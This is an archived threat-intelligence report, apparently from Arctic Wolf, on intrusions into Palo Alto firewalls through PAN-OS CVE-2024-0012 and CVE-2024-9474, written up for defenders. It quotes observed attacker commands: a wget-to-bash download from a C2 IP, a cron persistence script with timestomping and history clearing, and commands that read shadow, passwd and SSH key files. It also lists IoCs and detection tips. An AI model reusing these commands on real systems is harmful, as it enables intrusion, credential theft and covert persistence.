{
	"id": "1a0ea39d-b499-4f84-8a15-d65c7aaafa70",
	"created_at": "2026-04-06T00:22:25.138194Z",
	"updated_at": "2026-04-10T13:12:58.600246Z",
	"deleted_at": null,
	"sha1_hash": "c937bf3704b9970e8f08ffc5171e8c151e9f4a54",
	"title": "Arctic Wolf Observes Threat Campaign Targeting Palo Alto Networks Firewall Devices - Arctic Wolf",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 242074,
	"plain_text": "Arctic Wolf Observes Threat Campaign Targeting Palo Alto\r\nNetworks Firewall Devices - Arctic Wolf\r\nBy Julian Tuin, Stefan Hostetler, Jon Grimm, Aaron Diaz, and Trevor Daher\r\nPublished: 2024-11-22 · Archived: 2026-04-05 17:37:18 UTC\r\nKey Takeaways\r\nArctic Wolf has observed multiple intrusions across a variety of industries involving Palo Alto Network\r\nfirewall devices.\r\nAffected devices triggered downloads over HTTP including the Sliver C2 framework, coinminer binaries,\r\nand various other payloads.\r\nEvidence suggests that threat actors exploited the recently disclosed PAN-OS vulnerabilities CVE-2024-0012\r\nand CVE-2024-9474 to gain initial access.\r\nMonitoring firewall logs for usernames with unusual characters provides an opportunity for early kill chain\r\ndetection.\r\nSummary\r\nOn November 18, 2024, Palo Alto Networks disclosed the existence of two vulnerabilities (CVE-2024-0012 and\r\nCVE-2024-9474) in Palo Alto Networks OS (PAN-OS), the operating system used on their firewall devices. A day\r\nlater, watchTowr released a report providing technical details on how to chain the two vulnerabilities together to\r\nachieve remote code execution of these vulnerabilities. While they did not publish a proof-of-concept exploit, the\r\ndetails provided were sufficient to understand the exploitation process.\r\nSeveral hours after the watchTowr report was published, Arctic Wolf Labs began to observe multiple intrusions\r\naffecting Palo Alto Networks devices. Based on the close timing of the watchTowr disclosure and additional\r\nevidence reviewed by Arctic Wolf Labs, we assess with moderate confidence that these intrusions likely involved the\r\nexploitation of CVE-2024-0012 chained together with CVE-2024-9474 for initial access.\r\nWe are sharing details of these intrusions to help organizations defend against these threats. Please note that we may\r\nadd further detail to this article as we uncover additional information in our ongoing investigation.\r\nWhat We Know About the Intrusions\r\nExploitation Details\r\nHistorically, threat actors have shown an interest in rapidly weaponizing newly disclosed vulnerabilities, especially\r\nfor perimeter devices such as firewalls and VPN gateways. When the CVE-2024-3400 RCE vulnerability in PAN-OS was disclosed in April 2024 with a subsequent watchTowr technical writeup, threat actors were quick to begin\r\nmass exploitation using the available technical details.\r\nhttps://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/\r\nPage 1 of 9\n\nWith the disclosure of CVE-2024-0012/CVE-2024-9474, we observe a similar pattern of threat activity targeting\r\nPAN devices immediately following the publication of relevant technical details. As described in the most recent\r\nwatchTowr article, a username field can be abused for the injection of arbitrary commands. This aligns with firewall\r\nlog lines that we observed showing a Panorama console login where the username field includes a bash command\r\nenclosed in backticks:\r\n1,2024/11/20 REDACTED_TIME,REDACTED_ID,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,in\r\nNotably, some files observed during this stage of the attack referenced watchTowr and CVE-2024-9474.\r\nwatchTowr.js\r\nwatchTowr.php\r\nwatchTowr.txt\r\nCVE20249474.php\r\nCommand and Control\r\nArctic Wolf Labs observed several similar indicators of compromise in the most recent intrusions to what was seen\r\nwith CVE-2024-3400. For example, as seen in the example command below, a common pattern is for threat actors to\r\nuse curl or wget on compromised devices to download malicious payloads with IPv4 addresses in the URLs instead\r\nof domain names.\r\nSeveral commands were observed in the most recent intrusions that indicated potential ingress tool transfer. One\r\nnotable example is an instance where Sliver C2 was retrieved, an open-source alternative to the commonly used\r\nCobalt Strike penetration testing tool.\r\nwget --no-check-certificate -qO-https://104.131.69.106/vicidial/vicidial_sign.js|bash\r\nThe contents of the script (vicidial_sign.js) shown below has several key functions:\r\nCurl is used to download a JavaScript file (up.js) from the 104.131.69[.]106 IP address and saves it to the\r\n/usr/lib/e_nas directory. If curl fails, it attempts to use wget instead.\r\nThe touch command is used to change the modification and access timestamp of the /usr/lib/e_nas directory\r\nto match that of /usr/lib/php.ini, likely to hide the recent modification to the file.\r\nAny existing content in the /etc/cron.hourly/telemetry.cron file is cleared out, and a script is written to the\r\nsame path.\r\nThe script then checks if a process named cloud-lib is running (psgrep -x cloud_lib), and if not, it copies,\r\n/usr/lib/e_nas to the /usr/bin/cloud-lib directory, setting its permission to executable only by owner (chmod\r\n700), then proceeds to run it in the background.\r\nThe permission of /etc/cron.hourly/telemetry.cron is changed to 755, allowing it to be executed.\r\nThe touch command is used again to modify the timestamps of /etc/cron.hourly/telemetry.cron to match\r\n/etc/cron.hourly/logrotate_hourly, again likely to hide the modification to the file.\r\nhttps://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/\r\nPage 2 of 9\n\nBash history is cleared to avoid evidence of the commands having been executed.\r\n#!/bin/bash\r\ncurl -k https://104.131.69.106/vicidial/up.js -o /usr/lib/e_nas || wget --no-check-certificate https://\r\ntouch -r /usr/lib/php.ini /usr/lib/e_nas\r\necho '' \u003e /etc/cron.hourly/telemetry.cron\r\necho '#!/bin/sh' \u003e /etc/cron.hourly/telemetry.cron\r\necho \"bash -c 'if ! pgrep -x cloud-lib; then cp /usr/lib/e_nas /usr/bin/cloud-lib \u0026\u0026 chmod 700 /usr/bi\r\nchmod 755 /etc/cron.hourly/telemetry.cron\r\ntouch -r /etc/cron.hourly/logrotate_hourly /etc/cron.hourly/telemetry.cron\r\necho \"\" \u003e /root/.bash_history\r\nThe file (up.js) outlined in the section above is a UPX-packed Sliver payload.\r\nData Exfiltration\r\nIn observed intrusions, threat actors issued multiple data staging and exfiltration commands to retrieve sensitive\r\ninformation from firewall devices. Most exfiltration data included firewall configuration files which are known to\r\ninclude hashed credentials. Additionally, some attempts were made to exfiltrate operating system passwd and\r\nshadow files.\r\nHere is a selection of injected commands involving attempts to exfiltrate credentials and PAN configuration files:\r\ncat /root/.ssh/authorized_keys \u003e /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’\r\ncat /etc/networks \u003e /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’\r\narp -a \u003e /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’\r\ncat /etc/passwd \u003e /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’\r\ncat /etc/shadow \u003e /var/appweb/htdocs/unauth/watchTowr.txt’\r\nIn some instances, threat actors archived the output of these files using the tar command:\r\ntar -zcvf /tmp/f03.png /opt/pancfg/mgmt/saved-configs\r\n \r\nPHP Webshell\r\nOne of the payloads deployed was an obfuscated PHP webshell. The key functions are as follows:\r\n1. When a HTTP request is made, the webshell monitors for the use of an obfuscated POST parameter called\r\n$oNvPH071PRH, which is a base64 encoded and XOR encrypted string.\r\n2. Upon decryption of that POST parameter, the webshell looks for a provided payload parameter, which it\r\nproceeds to execute through the PHP eval function.\r\nhttps://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/\r\nPage 3 of 9\n\n3. The output is base64 encoded and XOR encrypted, and is padded with a header of the first 8 bytes consisting\r\nof the md5sum of 18f566d952acaa29, and with a footer of the last 8 bytes consisting of the md5sum of\r\n18f566d952acaa29.\r\nCoinminer Activity\r\nSome cases involved the deployment of XMRig on compromised firewall devices.\r\nShortly after the retrieval and execution of the file, network traffic reaching out to known XMRig IP addresses was\r\nobserved.\r\n{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"49VQVgmN9vYccj2tEgD7qgJPbLiGQcQ4uJxTRkTJUCZ\r\nHow Arctic Wolf Protects its Customers\r\nArctic Wolf is committed to ending cyber risk with its customers, and when active ransomware campaigns are\r\nidentified we move quickly to protect our customers.\r\nArctic Wolf Labs has leveraged threat intelligence around the exploitation of Palo Alto Networks devices to\r\nimplement new detections in the Arctic Wolf Platform to protect Managed Detection and Response (MDR)\r\ncustomers. As we discover any new information, we will enhance our detections to account for additional indicators\r\nof compromise and techniques leveraged by this threat actor.\r\nRemediation\r\nhttps://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/\r\nPage 4 of 9\n\nFor more details on recommended actions to address these vulnerabilies, see our security bulletin here.\r\nConclusion\r\nThreat actors don’t wait around once new vulnerabilities are disclosed, especially for perimeter devices such as\r\nfirewalls and VPN gateways. Across different campaigns and vulnerabilities, similar patterns emerge that help\r\ndefenders react early in the kill chain.\r\nThe activities we’ve highlighted here are only scratching the surface. In this campaign, we’ve observed exfiltration\r\nof device configurations and credentials, along with the deployment of various payloads including coinminers,\r\nbotnet malware, PHP webshells, and C2 frameworks. These observations illustrate the many ways that opportunistic\r\nthreat actors attempt to leverage these vulnerabilities, for financial gain and otherwise.\r\nDefenders should implement robust external monitoring and alerting for perimeter devices. In particular, close\r\nattention should be paid to unusual HTTP activity on such devices as it emerges. Additionally, as recommended by\r\nPalo Alto Networks, management interfaces of firewalls should not be exposed on the public internet, and should be\r\nrestricted to only trusted internal IP addresses.\r\nAcknowledgements\r\nArctic Wolf Labs acknowledges the work of Ishmael Guarin, Gagan Sahota, Jordan Bourcier, Phillip Kaiser, and\r\nAbdo Elhemaily on the Arctic Wolf Security Services team for identifying the mass exploitation campaign described\r\nin this article and identifying command injection in PAN firewall logs.\r\nAppendix\r\nTactics, Techniques, and Procedures (TTPs)\r\nTactic Technique Sub-techniques or Tools\r\nInitial Access\r\nT1190: Exploit Public-Facing\r\nApplication\r\n• Exploited CVE-2024-0012 to gain administrator access\r\nto the management web interface of devices running\r\nPAN-OS software\r\nPrivilege\r\nescalation\r\nT1068: Exploitation for\r\nPrivilege Escalation\r\n• Exploited CVE-2024-9474 to elevate privileges to root\r\non devices running PAN-OS software\r\nDefense\r\nEvasion\r\nT1027: Obfuscated Files or\r\nInformation\r\n• Obfuscated multiple scripts and malicious payloads\r\nT1070.003: Indicator removal:\r\nclear command history\r\n• Cleared bash history\r\nT1070.006: Indicator removal:\r\nTimestomp\r\n• Uses the touch command to modify file timestamps\r\nhttps://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/\r\nPage 5 of 9\n\nCredential\r\nAccess\r\nT1003.008: OS Credential\r\ndumping: /etc/passwd and\r\n/etc/shadow\r\n• Utilized the cat command to output file contents of\r\npasswd and shadow\r\nCollection\r\nT1560: Archive Collected Data • Utilized the tar command to archive staged data\r\nT1119: Automated Collection\r\n• Automatically collected firewall configuration\r\ninformation\r\nT1074.001: Local Data Staging\r\n• Output sensitive information to random files in a\r\nspecific directory before bundling them together for\r\nexfiltration\r\nCommand-and-Control\r\nT1105: Ingress Tool Transfer\r\n• Utilizes wget and curl to retrieve files from C2\r\naddresses\r\nImpact\r\nT1496.001: Computer\r\nHijacking\r\n• Deployed XMRig coinminer to mine cryptocurrency\r\nusing the device resources\r\nTools\r\nName Description\r\nXMRig A tool used to leverage host resources to mine cryptocurrencies such as XMR.\r\nSliver\r\nC2\r\nPenetration testing framework. An open-source alternative to another known penetration testing\r\nframework, Cobalt Strike.\r\nVulnerabilities Exploited\r\nVulnerability Use\r\nCVE-2024-0012\r\n(CVSS:9.8)\r\nAuthentication bypass vulnerability in Palo Alto Networks PAN-OS software allows an\r\nunauthenticated attacker with network access to the management web interface to gain\r\nPAN-OS administrator privileges\r\nCVE-2024-9474\r\n(CVSS:7.2)\r\nPrivilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a\r\nPAN-OS administrator with access to the management web interface to perform actions\r\non the firewall with root privileges.\r\nIndicators of Compromise (IoCs)\r\nIndicator Type Description\r\nhttps://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/\r\nPage 6 of 9\n\n104.131.69[.]106\r\nIPv4\r\nAddress\r\nSliver C2 /\r\nPayload\r\nServer\r\n104.21.52[.]167 IPv4 Sliver C2\u003c\r\n156.244.14[.]127\r\nIPv4\r\nAddress\r\nPayload\r\nServer\r\n180.210.220[.]139\r\nIPv4\r\nAddress\r\nPayload\r\nServer\r\n143.198.1[.]178\r\nIPv4\r\nAddress\r\nPayload\r\nServer\r\n(Malicious\r\nPHP Code)\r\n38.180.147[.]18\r\nIPv4\r\nAddress\r\nPayload\r\nServer\r\n31.41.221[.]158\r\nIPv4\r\nAddress\r\nPayload\r\nServer\r\n185.196.9[.]154\r\nIPv4\r\nAddress\r\nPayload\r\n(Malicious\r\nPHP Code)\r\n95.164.5[.]41\r\nIPv4\r\nAddress\r\nPayload\r\nServer\r\n93.113.25[.]46\r\nIPv4\r\nAddress\r\nSliver C2 /\r\nPayload\r\nServer\r\n107.191.48[.]109\r\nIPv4\r\nAddress\r\nSliver C2 /\r\nPayload\r\nServer\r\n38.60.214[.]5\r\nIPv4\r\nAddress\r\nPayload\r\nServer\r\n46.8.226[.]75\r\nIPv4\r\nAddress\r\nPayload\r\nServer\r\n(Malicious\r\nPHP Code)\r\n38.60.214[.]5/2.txt\r\nIPv4\r\nAddress\r\nPayload\r\nServer\r\nhttps://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/\r\nPage 7 of 9\n\n46.8.226[.]75/1.txt URL\r\nPayload\r\nServer\r\n93.113.25[.]46:8088/pay.txt URL\r\nPayload\r\nServer\r\nimg.dxyjg[.]com Domain\r\nPayload\r\nServer\r\nsys.traceroute[.]vip/actions/register.html?q=88238714\u0026yh=1743w7344 URL Sliver C2\r\n77.221.158[.]154\r\nIPv4\r\nAddress\r\nSliver C2\r\nA3092BFA4199DEF7FC525465895EE3784C6FCF55F0A7E9C8436C027E0F41CB4B\r\nSHA256\r\nHash\r\nSliver\r\nPayload\r\nDetection Opportunities\r\nAs part of our Managed Detection and Response service, Arctic Wolf has detections in place for techniques\r\ndescribed in this blog article, in addition to other techniques employed by threat actors described here.\r\nFirewall\r\nCommand injection used in exploitation of CVE-2024-9474 can be detected through bash commands in the\r\nusername field of log lines involving Panorama console logins. In general, if a username contains unusual\r\ncharacters, it should be treated as suspicious.\r\n1,2024/11/20 REDACTED_TIME,REDACTED_ID,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,in\r\nNetwork\r\nOn firewall devices, files downloaded over HTTP from URLs with IPv4 addresses should be considered suspicious\r\nwhen not originating from the vendor or another expected source such as a block list provider.\r\nAdditional Resources\r\nGet actionable insights and access to the security operations expertise of one of the largest security operations\r\ncenters (SOCs) in the world in Arctic Wolf’s 2024 Security Operations Report.\r\nLearn what’s new, what’s changed, and what’s ahead for the cybersecurity landscape, with insights from 1,000\r\nglobal IT and security leaders in the Arctic Wolf State of Cybersecurity: 2024 Trends Report.\r\nAbout Arctic Wolf Labs\r\nhttps://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/\r\nPage 8 of 9\n\nArctic Wolf is a group of elite security researchers, data scientists, and security development engineers who explore\r\nsecurity topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced\r\nthreat detection models with artificial intelligence, including machine learning, and drive continuous improvement in\r\nthe speed, scale, and detection efficacy of Arctic Wolf’s solution offerings. With their deep domain knowledge,\r\nArctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security\r\ncommunity at large.\r\nAuthors\r\nJulian Tuin\r\nJulian is a Senior Threat Intelligence Researcher at Arctic Wolf Labs with more than 6 years of industry experience.\r\nHe has experience in identifying and tracking campaigns for new and emerging threats.\r\nStefan Hostetler\r\nStefan is a Lead Threat Intelligence Researcher at Arctic Wolf. With over a decade of industry experience under his\r\nbelt, he focuses on extracting actionable insight from novel threats to help organizations protect themselves\r\neffectively.\r\nJon Grimm\r\nJon is a Threat Intelligence Analyst at Arctic Wolf dedicated to identifying new cyber threats and producing\r\nactionable intelligence that enhances organizational defenses. He has background of 10 years’ experience in several\r\ndomains of cybersecurity, holds a bachelor’s degree in law enforcement, and holds several industry certifications\r\n(CISSP, GCFA, GCTI).\r\nAaron Diaz\r\nAaron is a Lead Security Researcher at Arctic Wolf Labs focusing on malware analysis and detection research. He\r\nhas more than 8 years of experience in the industry with a background in threat hunting, malware\r\nanalysis/development and vulnerability research. Aaron has passion for novel threat research and adversary\r\ntradecraft.\r\nTrevor Daher\r\nTrevor Daher is a Technical Lead within Arctic Wolf’s Security Services group supporting the Managed Detection\r\nand Response (MDR) service.\r\nSource: https://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/\r\nhttps://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/"
	],
	"report_names": [
		"arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434945,
	"ts_updated_at": 1775826778,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c937bf3704b9970e8f08ffc5171e8c151e9f4a54.pdf",
		"text": "https://archive.orkl.eu/c937bf3704b9970e8f08ffc5171e8c151e9f4a54.txt",
		"img": "https://archive.orkl.eu/c937bf3704b9970e8f08ffc5171e8c151e9f4a54.jpg"
	}
}